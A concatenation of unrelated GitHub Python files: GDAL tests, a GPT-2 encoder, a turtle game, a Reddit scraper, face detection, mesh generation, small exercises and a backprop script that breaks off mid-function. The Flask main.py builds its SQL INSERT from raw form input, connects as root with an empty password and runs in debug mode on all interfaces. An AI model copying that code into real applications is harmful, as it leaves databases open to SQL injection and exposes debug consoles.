ogr.GeometryTypeToName (#4871)\n\ndef ogr_basic_9():\n\n geom_type_tuples = [ [ ogr.wkbUnknown, \"Unknown (any)\" ],\n [ ogr.wkbPoint, \"Point\" ],\n [ ogr.wkbLineString, \"Line String\"],\n [ ogr.wkbPolygon, \"Polygon\"],\n [ ogr.wkbMultiPoint, \"Multi Point\"],\n [ ogr.wkbMultiLineString, \"Multi Line String\"],\n [ ogr.wkbMultiPolygon, \"Multi Polygon\"],\n [ ogr.wkbGeometryCollection, \"Geometry Collection\"],\n [ ogr.wkbNone, \"None\"],\n [ ogr.wkbUnknown | ogr.wkb25DBit, \"3D Unknown (any)\" ],\n [ ogr.wkbPoint25D, \"3D Point\" ],\n [ ogr.wkbLineString25D, \"3D Line String\"],\n [ ogr.wkbPolygon25D, \"3D Polygon\"],\n [ ogr.wkbMultiPoint25D, \"3D Multi Point\"],\n [ ogr.wkbMultiLineString25D, \"3D Multi Line String\"],\n [ 
ogr.wkbMultiPolygon25D, \"3D Multi Polygon\"],\n [ ogr.wkbGeometryCollection25D, \"3D Geometry Collection\"],\n [ 123456, \"Unrecognized: 123456\" ]\n ]\n\n for geom_type_tuple in geom_type_tuples:\n if ogr.GeometryTypeToName(geom_type_tuple[0]) != geom_type_tuple[1]:\n gdaltest.post_reason('fail')\n print('Got %s, expected %s' % (ogr.GeometryTypeToName(geom_type_tuple[0]), geom_type_tuple[1]))\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Run test_ogrsf -all_drivers\n\ndef ogr_basic_10():\n\n import test_cli_utilities\n if test_cli_utilities.get_test_ogrsf_path() is None:\n return 'skip'\n\n ret = gdaltest.runexternal(test_cli_utilities.get_test_ogrsf_path() + ' -all_drivers')\n\n if ret.find('INFO') == -1 or ret.find('ERROR') != -1:\n print(ret)\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test double call to UseExceptions() (#5704)\n\ndef ogr_basic_11():\n\n if not ogrtest.have_geos():\n return 'skip'\n\n used_exceptions_before = ogr.GetUseExceptions()\n for i in range(2):\n ogr.UseExceptions()\n geom = ogr.CreateGeometryFromWkt('POLYGON ((-65 0, -30 -30, -30 0, -65 -30, -65 0))')\n with gdaltest.error_handler():\n geom.IsValid()\n if used_exceptions_before == 0:\n ogr.DontUseExceptions()\n\n return 'success'\n\n###############################################################################\n# Test OFSTBoolean, OFSTInt16 and OFSTFloat32\n\ndef ogr_basic_12():\n\n # boolean integer\n feat_def = ogr.FeatureDefn()\n if ogr.GetFieldSubTypeName(ogr.OFSTBoolean) != 'Boolean':\n gdaltest.post_reason('fail')\n return 'fail'\n field_def = ogr.FieldDefn( 'fld', ogr.OFTInteger )\n field_def.SetSubType( ogr.OFSTBoolean )\n if field_def.GetSubType() != ogr.OFSTBoolean:\n gdaltest.post_reason('fail')\n return 'fail'\n feat_def.AddFieldDefn( field_def )\n\n f = ogr.Feature(feat_def)\n f.SetField('fld', 0)\n f.SetField('fld', 1)\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetField('fld', 2)\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if f.GetField('fld') != 1:\n gdaltest.post_reason('fail')\n return 'fail'\n\n f.SetField('fld', '0')\n f.SetField('fld', '1')\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetField('fld', '2')\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if f.GetField('fld') != 1:\n gdaltest.post_reason('fail')\n return 'fail'\n\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n field_def = ogr.FieldDefn( 'fld', ogr.OFTString )\n field_def.SetSubType( ogr.OFSTBoolean )\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if field_def.GetSubType() != ogr.OFSTNone:\n gdaltest.post_reason('fail')\n return 'fail'\n\n # boolean list\n feat_def = ogr.FeatureDefn()\n field_def = ogr.FieldDefn( 'fld', ogr.OFTIntegerList )\n field_def.SetSubType( ogr.OFSTBoolean )\n if field_def.GetSubType() != ogr.OFSTBoolean:\n gdaltest.post_reason('fail')\n return 'fail'\n feat_def.AddFieldDefn( field_def )\n\n f = ogr.Feature(feat_def)\n f.SetFieldIntegerList(0, [0,1])\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetFieldIntegerList(0, [0,1,2,1])\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if f.GetField('fld') != 
[0,1,1,1]:\n print(f.GetField('fld'))\n gdaltest.post_reason('fail')\n return 'fail'\n\n # int16 integer\n feat_def = ogr.FeatureDefn()\n if ogr.GetFieldSubTypeName(ogr.OFSTInt16) != 'Int16':\n gdaltest.post_reason('fail')\n return 'fail'\n field_def = ogr.FieldDefn( 'fld', ogr.OFTInteger )\n field_def.SetSubType( ogr.OFSTInt16 )\n if field_def.GetSubType() != ogr.OFSTInt16:\n gdaltest.post_reason('fail')\n return 'fail'\n feat_def.AddFieldDefn( field_def )\n\n f = ogr.Feature(feat_def)\n f.SetField('fld', -32768)\n f.SetField('fld', 32767)\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetField('fld', -32769)\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if f.GetField('fld') != -32768:\n gdaltest.post_reason('fail')\n return 'fail'\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetField('fld', 32768)\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if f.GetField('fld') != 32767:\n gdaltest.post_reason('fail')\n return 'fail'\n\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n field_def = ogr.FieldDefn( 'fld', ogr.OFTString )\n field_def.SetSubType( ogr.OFSTInt16 )\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if field_def.GetSubType() != ogr.OFSTNone:\n gdaltest.post_reason('fail')\n return 'fail'\n\n # float32\n feat_def = ogr.FeatureDefn()\n if ogr.GetFieldSubTypeName(ogr.OFSTFloat32) != 'Float32':\n gdaltest.post_reason('fail')\n return 'fail'\n field_def = ogr.FieldDefn( 'fld', ogr.OFTReal )\n field_def.SetSubType( ogr.OFSTFloat32 )\n if field_def.GetSubType() != ogr.OFSTFloat32:\n gdaltest.post_reason('fail')\n return 'fail'\n feat_def.AddFieldDefn( field_def )\n\n if False:\n f = ogr.Feature(feat_def)\n gdal.ErrorReset()\n f.SetField('fld', '1.23')\n if gdal.GetLastErrorMsg() != '':\n gdaltest.post_reason('fail')\n return 'fail'\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetField('fld', 1.230000000001)\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if abs(f.GetField('fld') - 1.23) < 1e-8:\n gdaltest.post_reason('fail')\n f.DumpReadable()\n return 'fail'\n\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n field_def = ogr.FieldDefn( 'fld', ogr.OFSTFloat32 )\n field_def.SetSubType( ogr.OFSTInt16 )\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if field_def.GetSubType() != ogr.OFSTNone:\n gdaltest.post_reason('fail')\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test OGRParseDate (#6452)\n\ndef ogr_basic_13():\n feat_defn = ogr.FeatureDefn('test')\n field_defn = ogr.FieldDefn('date', ogr.OFTDateTime)\n feat_defn.AddFieldDefn(field_defn)\n\n tests = [ ('2016/1/1', '2016/01/01 00:00:00'),\n ('2016/1/1 12:34', '2016/01/01 12:34:00'),\n ('2016/1/1 12:34:56', '2016/01/01 12:34:56'),\n ('2016/1/1 12:34:56.789', '2016/01/01 12:34:56.789'),\n ('2016/12/31', '2016/12/31 00:00:00'),\n ('-2016/12/31', '-2016/12/31 00:00:00'),\n ('2016-12-31', '2016/12/31 00:00:00'),\n ('0080/1/1', '0080/01/01 00:00:00'),\n ('80/1/1', '1980/01/01 00:00:00'),\n ('0010/1/1', '0010/01/01 00:00:00'),\n ('9/1/1', '2009/01/01 00:00:00'),\n ('10/1/1', '2010/01/01 00:00:00'),\n ('2016-13-31', None),\n ('2016-0-31', None),\n 
('2016-1-32', None),\n ('2016-1-0', None),\n ('0/1/1','2000/01/01 00:00:00'),\n ('00/1/1', '2000/01/01 00:00:00'),\n ('00/00/00', None),\n ('000/00/00', None),\n ('0000/00/00', None),\n ('//foo', None) ]\n\n for (val, expected_ret) in tests:\n f = ogr.Feature(feat_defn)\n f.SetField('date', val)\n if f.GetField('date') != expected_ret:\n gdaltest.post_reason('fail')\n print(val)\n print(f.GetField('date'))\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test ogr.Open(.) in an empty directory\n\ndef ogr_basic_14():\n \n os.mkdir('tmp/ogr_basic_14')\n os.chdir('tmp/ogr_basic_14')\n ds = ogr.Open('.')\n os.chdir('../..')\n\n if ds is not None:\n return 'fail'\n\n os.rmdir('tmp/ogr_basic_14')\n\n return 'success'\n\n###############################################################################\n# cleanup\n\ndef ogr_basic_cleanup():\n gdaltest.lyr = None\n gdaltest.ds = None\n\n return 'success'\n\ngdaltest_list = [\n ogr_basic_1,\n ogr_basic_2,\n ogr_basic_3,\n ogr_basic_4,\n ogr_basic_5,\n ogr_basic_6,\n ogr_basic_7,\n ogr_basic_8,\n ogr_basic_9,\n ogr_basic_10,\n ogr_basic_11,\n ogr_basic_12,\n ogr_basic_13,\n ogr_basic_14,\n ogr_basic_cleanup ]\n\n#gdaltest_list = [ ogr_basic_13 ]\n\nif __name__ == '__main__':\n\n gdaltest.setup_run( 'ogr_basic_test' )\n\n gdaltest.run_tests( gdaltest_list )\n\n gdaltest.summarize()\n","repo_name":"ryandavid/rotobox","sub_path":"3rd_party/gdal/autotest/ogr/ogr_basic_test.py","file_name":"ogr_basic_test.py","file_ext":"py","file_size_in_byte":21658,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"12206875032","text":"from pytorch_transformers import GPT2Config, GPT2Model\nfrom onmt.modules.embeddings import Embeddings\nfrom onmt.encoders.transformer import EncoderBase\nimport os\nfrom programmingalpha.models import expandEmbeddingByN\n\nclass OnmtGPT2Encoder(EncoderBase):\n def __init__(self, model_path):\n super(OnmtGPT2Encoder, self).__init__()\n config=GPT2Config.from_json_file(os.path.join( model_path, \"config.json\") )\n pretrained_dict=os.path.join( model_path, \"pytorch_model.bin\")\n if os.path.exists(pretrained_dict):\n model=GPT2Model.from_pretrained(pretrained_model_name_or_path=pretrained_dict, config=config)\n print(\"init GPT2 model with {} weights\".format(len(model.state_dict())))\n else:\n model=GPT2Model(config)\n\n model.wte=expandEmbeddingByN(model.wte, 4)\n self.encoder=model\n\n #print(model)\n print(\"***\"*20)\n\n \n def forward(self, src, lengths=None):\n \"\"\"\n Args:\n src (LongTensor):\n padded sequences of sparse indices ``(src_len, batch, nfeat)``\n lengths (LongTensor): length of each sequence ``(batch,)``\n\n \"\"\"\n inputids=src.squeeze(2).transpose(0,1).contiguous()\n\n outputs=self.encoder(input_ids=inputids)\n #print(len(outputs))\n #print(outputs)\n\n emb=outputs[2][-1]\n memory_bank=outputs[0]\n\n emb=emb.transpose(0,1).contiguous()\n memory_bank=memory_bank.transpose(0,1).contiguous()\n\n #print(\"src--> outs\", src.size(), emb.size(), memory_bank.size())\n\n return emb, memory_bank, lengths \n\ndef getWordEmbeddingFromGPT2Encoder(model:OnmtGPT2Encoder):\n return model.encoder.wte\n\ndef buildGPT2(**kwargs):\n if \"model_path\" not in kwargs:\n import programmingalpha\n kwargs[\"model_path\"] = programmingalpha.GPT2Base\n\n encoder=OnmtGPT2Encoder(kwargs[\"model_path\"])\n\n return 
encoder","repo_name":"zhangzhenyu13/ProgrammingAlpha","sub_path":"programmingalpha/models/GenerationNets/GPT2Gen.py","file_name":"GPT2Gen.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"12050526895","text":"from flask import Flask, render_template, request\nfrom flask_mysqldb import MySQL\napp = Flask(__name__)\n\n\napp.config['MYSQL_HOST'] = '10.80.7.129'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = ''\napp.config['MYSQL_DB'] = 'satdata'\n\nmysql = MySQL(app)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == \"POST\":\n details = request.form\n log_time = details['log']\n _ID = details['id']\n orbit = details['or']\n sendfrom = details['send']\n location = details['loc']\n \n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO messages(log_time, ID, orbit, sendfrom, location) VALUES ('%s','%s','%s','%s','%s')\" %(log_time,_ID,orbit,sendfrom,location))\n mysql.connection.commit()\n cur.close()\n return 'successfully incert'\n return render_template('web1.html')\n\n\nif __name__ == '__main__':\n app.run(\"0.0.0.0\", port=5000, debug=True)\n","repo_name":"dinuka555/test_3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15462280745","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\nplayer = Player()\nscoreboard = Scoreboard()\ncars = CarManager()\n\nfor i in range(100):\n cars.decide_cars()\n cars.move_cars()\n\nscreen.listen()\nscreen.onkey(player.move, 'Up')\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(0.1)\n screen.update()\n cars.decide_cars()\n cars.move_cars()\n if player.ycor() > player.get_finish():\n player.reset_pos()\n scoreboard.inc_score()\n cars.inc_speed()\n if not cars.is_clear(player.ycor(), True):\n game_is_on = False\n scoreboard.game_over()\n\nscreen.exitonclick()\n","repo_name":"jgregory39/100DoC-Python","sub_path":"Day-23-Turtle-Crossing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11144720463","text":"def pali(n):\n s=n\n m=0\n while s:\n re=s%10\n m=m*10+re\n s=s//10\n return n==m\n \nn=int(input())\nc=0\nlst=list(map(int,input().split()))\nfor i in lst:\n if pali(i):\n c+=1\nprint(c)","repo_name":"RenukaPulavarthi/codemind-python","sub_path":"Count_palindromes.py","file_name":"Count_palindromes.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6666997616","text":"import praw, os\nfrom dotenv import load_dotenv\nfrom .produce import produce_k\nfrom .analysis import analysis_s\nfrom .map import submission_to_dict, comment_to_dict, reddit_to_json\n\ndef display_author(comment):\n if comment.author:\n return comment.body\n\nclass gather(produce_k, analysis_s):\n def __init__(self, args): \n load_dotenv()\n produce_k.__init__(self, int(os.getenv(\"FLUSH_LIMIT\")),\n os.getenv(\"BOOTSTRAP_SERVER\"))\n analysis_s.__init__(self, 'en')\n self.keyword = args.k\n self.limit = args.l\n self.reddit = praw.Reddit(client_id=os.getenv(\"C_ID\"),\n 
client_secret=os.getenv(\"C_SECRET\"),\n user_agent=os.getenv(\"U_AGENT\"),\n username=os.getenv(\"USERNAME\"),\n password=os.getenv(\"PASSWORD\"))\n\n def post_metadata(self, post):\n \n obj = {}\n\n obj[\"post_score\"] = self.analyze(post.title)\n submission_to_dict(obj, post)\n\n post.comments.replace_more(limit=10)\n for comment in post.comments.list():\n if comment.body:\n obj[\"comment_score\"] = self.analyze(comment.body)\n\n comment_to_dict(obj, comment)\n self.send('reddit', reddit_to_json(obj))\n \n def get_posts(self, search):\n return self.reddit.subreddit(\"all\").search(search, limit=self.limit)\n\n def launch(self):\n submission = self.get_posts(self.keyword)\n for p in submission:\n self.post_metadata(p)\n","repo_name":"Surphix/RedditGather","sub_path":"gather/gather.py","file_name":"gather.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34640506677","text":"from argparse import Namespace\n\nargs = Namespace(\n# root directory of the datasets\n mnistroot = \"./data/mnist\",\n cifarroot = \"./data/cifar\",\n svhnroot = \"./data/svhn\",\n\n # learning rate\n lr = 1.0,\n\n # batch size\n batch_size = 8,\n\n # epochs for image classification\n epoch_image_classification = 500,\n\n # epochs for masked language modeling\n epoch_language_modeling = 100,\n\n # manual seed\n manual_seed = 100\n)","repo_name":"FaisalAhmed0/Deep-Leakage-from-Gradients","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1120462295","text":"#################################\n# Nicolas LAUBE\n# Sylvain MACE\n# Melvin BICHO\n# utility package for the project\n#####################################\nimport cv2 as cv\n\n\ndef reco_webcam():\n face_cascade = cv.CascadeClassifier('Data/haarcascade_frontalface_default.xml')\n eye_cascade = cv.CascadeClassifier('Data/haarcascade_eye.xml')\n\n #Webcam capture\n video_capture = cv.VideoCapture(0)\n while True:\n ret, frame = video_capture.read()\n frame = cv.flip(frame, 1)\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x, y, w, h) in faces:\n cv.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n eyes = eye_cascade.detectMultiScale(roi_gray)\n for (ex, ey, ew, eh) in eyes:\n cv.rectangle(roi_color, (ex, ey), (ex+ew, ey+eh), (0, 255, 0), 2)\n cv.imshow('img', frame)\n if cv.waitKey(1) == 27:\n break # esc to quit\n cv.destroyAllWindows()\n\n\ndef face_delimitation(facepath):\n # cascades assumed to live in the same Data/ folder used by reco_webcam above\n face_cascade = cv.CascadeClassifier('Data/haarcascade_frontalface_default.xml')\n eye_cascade = cv.CascadeClassifier('Data/haarcascade_eye.xml')\n img = cv.imread(facepath)\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x,y,w,h) in faces:\n cv.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n eyes = eye_cascade.detectMultiScale(roi_gray)\n for (ex,ey,ew,eh) in eyes:\n cv.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n cv.imshow('img',img)\n cv.waitKey(0)\n 
cv.destroyAllWindows()\n","repo_name":"NicolasLaube/G10_Raspberry_Pi_SNM","sub_path":"facerecognition/haar_cascade_detection.py","file_name":"haar_cascade_detection.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34735875203","text":"from TwoDimensionalUtils.data import *\nimport numpy as np\n# from display import displayMesh\n\n'''\n Author: Wang Jingzhou\n Email: Andrewwang@whu.edu.cn\n Affiliation: School of water resources and hydropower engineering, Wuhan University\n'''\n\ndef triMesh(domain):\n points = np.array([domain.point[point_name].coord\n for point_name in domain.point_name])\n # get a rectangle cover the points\n coord_max = np.max(points, axis=0)\n coord_min = np.min(points, axis=0)\n\n # enlarge the rectangle\n ratio = 3\n length = coord_max - coord_min\n coord_max = coord_max + ratio * length\n coord_min = coord_min - ratio * length\n length = ( 1 + 2 * ratio) * length\n\n # create a super triangle according to the rectangle\n\n new_name = max(domain.point_name) + 1\n points = [Point(new_name, coord_min)]\n for i in range(len(coord_max)):\n new_name += 1\n offset = np.zeros_like(coord_min)\n offset[i] = len(coord_min) * length[i]\n points.append(Point(new_name, coord_min + offset))\n init_triangles = [Triangle(0, points)]\n\n # initialize the mesh\n mesh = TriMesh(init_triangles)\n\n # add the points at the boundary of the domain\n for point_name in domain.point_name:\n mesh.addPoint(domain.point[point_name])\n\n # delete the points which in the super triangle\n point_init = {init_triangle.point[point_name]\n for init_triangle in init_triangles\n for point_name in init_triangle.point_name}\n for point in list(point_init):\n mesh.delPoint(point)\n\n # delete the element out of the domain\n triangle_del = []\n for triangle_name in mesh.triangle_name:\n triangle = mesh.triangle[triangle_name]\n center_coord = triangle.center\n point = Point(0, center_coord)\n if not(domain.insideJudge(point)):\n triangle_del.append(triangle_name)\n for triangle_name in triangle_del:\n mesh.delTriangle(mesh.triangle[triangle_name])\n\n # optimize the mesh\n mesh.initMeshParam(domain)\n mesh_R = sorted(zip(mesh.R.values(),mesh.R.keys()))\n while mesh_R[-1][0] > 1:\n mesh.updateMeshParam(mesh_R[-1][1])\n mesh_R = sorted(zip(mesh.R.values(), mesh.R.keys()))\n\n return mesh\n\n# TODO define a function to judge the order of the points\ndef pointsOrder(points):\n pass\n\ndef reflect(points, i, j, m, n):\n xi = 2 / m * i - 1\n eta = 2 / n * j - 1\n N1 = (1 - xi) * (1 - eta) / 4\n N2 = (1 + xi) * (1 - eta) / 4\n N3 = (1 + xi) * (1 + eta) / 4\n N4 = (1 - xi) * (1 + eta) / 4\n N = np.array([N1, N2, N3, N4])\n coord = np.dot(N, points)\n return coord.tolist()\n\ndef QuadMesh(ori_points, m, n):\n points = np.array(ori_points)\n pointsOrder(points)\n node = []\n elem = []\n node_row = []\n for i in range(m + 1):\n node_row.append(reflect(points, i, 0, m, n))\n node.append(node_row)\n\n for j in range(1, n + 1):\n node_row = []\n node_row.append(reflect(points, 0, j, m, n))\n for i in range(1, m + 1):\n node_row.append(reflect(points, i, j, m, n))\n elem.append([[j - 1, i - 1],\n [j - 1, i],\n [j, i],\n [j, i - 1]])\n node.append(node_row)\n\n return np.array(node), np.array(elem)","repo_name":"guanshaoheng/pyfem","sub_path":"utils/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} 
+{"seq_id":"26742427217","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 3 20:12:50 2014\n\n@author: zah\n\"\"\"\nimport inspect\nfrom collections import defaultdict\n\nfrom IPython.utils import traitlets\nfrom IPython.html import widgets\n\ndef add_to_list(l, elem):\n \"\"\"Add an element to a list changing the id and refreshing it\"\"\"\n l = l + [elem]\n\ndef remove_from_list(l, elem):\n \"\"\"Delete an element from a list changing the id and refreshing it\"\"\"\n l.remove(elem)\n l = list(l)\n\ndef add_child(container, child):\n container.children = container.children + (child,)\n\n\nclass EvaluableWidget(widgets.TextWidget):\n\n def __setattribute__(self, attr, value):\n\n super(EvaluableWidget, self).__setattribute__(attr, value)\n if attr == 'value':\n self.context = inspect.stack[1][0].f_locals\n\n def __getattribute__(self, attr):\n\n value = super(EvaluableWidget, self).__getattribute__(attr)\n if attr == 'value':\n value = eval(value, globals(), self.context)\n\n\n\nwidget_mapping = defaultdict(lambda: widgets.TextWidget, {\n 'String': widgets.TextWidget,\n 'Boolean': widgets.CheckboxWidget,\n 'Integer': widgets.IntTextWidget,\n 'Double': widgets.FloatTextWidget,\n 'Object': EvaluableWidget,\n\n})\n\nparam_types = widget_mapping.keys()","repo_name":"Zaharid/labcore","sub_path":"labcore/iobjects/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29422148779","text":"# completa el código de la función\ndef amigos(a, b):\n def sumaDivisores(num):\n suma = 0\n for i in range(1, num):\n if num % i == 0:\n suma += i\n return suma\n suma_a = sumaDivisores(a)\n suma_b = sumaDivisores(b)\n return suma_a == b and suma_b == a\n# Valores de ejemplo para probar la función\nn1 = 220\nn2 = 284\nresultado = amigos(n1, n2)\nprint(resultado)","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej2/tema2_ej2_dc21469a6cb8f3f7b42f4f0a4fc3803d.py","file_name":"tema2_ej2_dc21469a6cb8f3f7b42f4f0a4fc3803d.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31226353299","text":"import numpy as np\nimport math\nfrom sklearn.model_selection import train_test_split\n\nfilename = 'data.txt'\nwrite_file = 'output.txt'\nweights_1 = np.array([[0.1, 0.4],\n [0.3, 0.3],\n [0.4, 0.2]])\nweights_2 = np.array([[0.1, 0.3], \n [0.3, 0.1]])\n\nbias = np.array([[1.0],\n [1.0]])\n\nbias_weights = np.array([[0.8, 0.8],\n [1.0, 1.0]])\n\nlearning_rate = .5\n\ndef read_data():\n try:\n with open(filename) as f_obj:\n lines = f_obj.readlines()\n return lines\n\n except FileNotFoundError:\n print(\"File Not Found\")\n return None\n\ndef split_data(lines):\n \"\"\"Split data into train and test sets.\"\"\"\n \n num_examples = len(lines)\n input_array = np.zeros((num_examples, 3))\n output_array = np.zeros((num_examples, 2))\n\n index = 0\n for line in lines:\n in1, in2, in3, out = line.split(\" \")\n\n # minimum = min(float(in1), float(in2), float(in3))\n # maximum = max(float(in1), float(in2), float(in3))\n\n # range1 = maximum - minimum\n # in1 = (float(in1) - minimum) / range1\n # in2 = (float(in2) - minimum) / range1\n # in3 = (float(in3) - minimum) / range1\n\n # range2 = 1 - (-1)\n # in1 = (in1 * range2) + (-1)\n # in2 = (in2 * range2) + (-1)\n # in3 = (in3 * range2) + (-1)\n\n input_array[index][0] = float(in1)\n input_array[index][1] = float(in2)\n 
input_array[index][2] = float(in3)\n if float(out) == 1:\n output_array[index][0] = float(out)\n output_array[index][1] = float(0)\n else:\n output_array[index][0] = float(0)\n output_array[index][1] = float(1)\n\n index = index + 1\n\n i_train, i_test, o_train, o_test = train_test_split(input_array, output_array, train_size=.80, test_size=.20)\n return i_train, i_test, o_train, o_test\n\ndef activation(node_net_input):\n \"\"\"Apply the sigmoid activation function to the net input of a node.\"\"\"\n # Activation function is the sigmoid function\n\n node_output = 1 / (1 + math.exp(-1 * node_net_input))\n\n return node_output\n\ndef forward_pass(inputs):\n \"\"\"Perform the forward pass of the neural network\"\"\"\n\n # first layer\n in1 = inputs.dot(weights_1)\n net_input1 = in1\n for i in range(in1.size):\n net_input1[i] = in1[i] + (bias[0] * bias_weights[0][i])\n # net_input1 = in1 + (bias[0] * bias_weights[0])\n net_output1 = net_input1\n \n for i in range(in1.size):\n net_output1[i] = activation(net_input1[i])\n\n # second layer\n # in2 = weights_2.dot(net_output1)\n in2 = net_output1.dot(weights_2)\n net_input2 = in2\n for i in range(in2.size):\n net_input2[i] = in2[i] + (bias[1] * bias_weights[1][i])\n # net_input2 = in2 + (bias[1] * bias_weights[1])\n net_output2 = net_input2\n for i in range(in2.size):\n net_output2[i] = activation(net_input2[i])\n\n return net_output1, net_output2\n\ndef calculate_loss(outputs, targets):\n \"\"\"Calculate the loss for the results of the forward pass.\"\"\"\n # Loss function: L = (o1 - o1')^2 + (o2 - o2')^2\n\n l1 = (targets[0] - outputs[0]) * (targets[0] - outputs[0])\n l2 = (targets[1] - outputs[1]) * (targets[1] - outputs[1])\n\n loss = l1 + l2\n\n return loss\n\ndef calculate_output_layer_gradient(network_output, target_output, node_output):\n \"\"\"Calculate the gradient of an output layer weight.\"\"\"\n deltaz = calculate_deltaz(network_output, target_output)\n gradient = deltaz * node_output\n\n return gradient\n\ndef calculate_hidden_layer_gradient(network_outputs, target_outputs, weight_1, weight_2, node_output, network_input):\n part_deriv_loss_out1 = calculate_deltaz(network_outputs[0], target_outputs[0]) * weight_1\n part_deriv_loss_out2 = calculate_deltaz(network_outputs[1], target_outputs[1]) * weight_2\n part_deriv_out_net = node_output * (1 - node_output)\n part_deriv_net_weight = network_input\n\n gradient = (part_deriv_loss_out1 + part_deriv_loss_out2) * part_deriv_out_net * part_deriv_net_weight\n return gradient\n\ndef calculate_hidden_layer_bias_gradient(network_outputs, target_outputs, weight_1, weight_2, node_output):\n part_deriv_loss_out1 = calculate_deltaz(network_outputs[0], target_outputs[0]) * weight_1\n part_deriv_loss_out2 = calculate_deltaz(network_outputs[1], target_outputs[1]) * weight_2\n part_deriv_out_net = node_output * (1 - node_output)\n\n gradient = (part_deriv_loss_out1 + part_deriv_loss_out2) * part_deriv_out_net\n return gradient\n\n\ndef calculate_deltaz(network_output, target_output):\n part_deriv_loss = 2 * (network_output - target_output)\n part_deriv_output = network_output * (1 - network_output)\n deltaz = part_deriv_loss * part_deriv_output\n\n return deltaz\n\ndef calculate_gradients(network_inputs, network_outputs, targets, layer1_node_outputs):\n \"\"\"Calculate the gradients of all of the weights.\"\"\"\n output_layer_gradient_array = np.zeros((2, 2))\n hidden_layer_gradient_array = np.zeros((3, 2))\n output_layer_bias_gradients = np.zeros((1, 2))\n hidden_layer_bias_gradients = np.zeros((1, 
